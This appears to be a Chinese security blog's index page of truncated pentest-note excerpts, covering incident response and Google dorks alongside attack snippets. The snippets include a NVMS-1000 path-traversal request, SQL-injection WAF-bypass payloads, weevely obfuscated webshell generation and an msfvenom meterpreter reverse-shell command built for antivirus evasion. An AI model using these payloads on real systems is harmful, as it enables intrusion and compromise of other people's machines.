安卓常见测试项

Android 开发的四大组件分别是：活动（activity），用于表现功能；服务（service），后台运行服务，不提供界面呈现；广播接受者（Broadcast Receive），勇于接收广播；内容

TVT数码科技 NVMS-1000 路径遍历漏洞

fofa
app="TVT-NVMS-1000"
发送请求包读取文件
GET /../../../../../../../../../../../../windows/win.in

md5解密网站

国内Md5解密： http://t007.cn/
https://cmd5.la/
https://cmd5.com/
https://pmd5.com/
http://ttmd5.com/
http

cve2021-1732windows本地提权复现

https://github.com/Ascotbe/Kernelhub
CVE-2021-1732: 权限提升
漏洞发生在Windows图形驱动win32kfull!NtUserCreateWind

大型企业渗透技巧

企业常见安全问题
cms,框架过时
验证码问题，不加验证码
弱口令初始密码
大量告警，误报很多，工作量大，对入侵方式难以确认
第三方拒绝服务：企业系统调用第三方厂商接口，扫描器加载payload，触发

应急响应

1，检查系统账号安全
弱口令，lusrmgr.msc，注册表，日志管理员登陆时间，eventvwr.msc
2,检查异常端口，进程
端口连接情况，netstat -ano,tasklist |find

应急响应windows

应急响应基本流程
收集信息：收集客户信息和中毒主机信息，包括样本
判断类型：判断是否是安全事件，何种安全事件，勒索，挖矿，断网，dos等等
深入分析：日志分析，进程分析，启动项分析，样本分析
清理处置

提权

通常脚本所处的权限
asp/php匿名权限
aspx user权限
jsp通常是系统权限
脚本主要看容器的权限
收集信息
内网外网
服务器系统版本位数
服务器的补丁情况
服务器安装的软件情况
服务器的

sql注入绕过

整数溢出报错函数
and cot(0)
and pow(988888,999999)
and exp(710)
利用几何函数进行报错注入
and polygon(user)
and linestrin

sql注入绕过waf

id=1 union /!10044select 1,2,3 -- sf/%0afrom admin limit 1,1%23/
=>select 1,2,3 from admin limit

weevely getshell

weevely url password
生成混淆shell
weevely generate -obfuscator cleartext1_php password 文件名
obfusc1_php

msf免杀

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=端口 -f raw -e x8

谷歌语法

“”双引号内的内容不可以拆分
site指定域名
inurl存在关键字的网页url
filetype指定文件类型
intext网页正文中的关键字
intitle网页标题中的关键字
link link：

xss

构造xss脚本
常用html标签
<iframe>创建包含另一个文档的内联框架（行内框架）
<textarea>定义多行的文本输入控件
<img>嵌入一幅图像
&l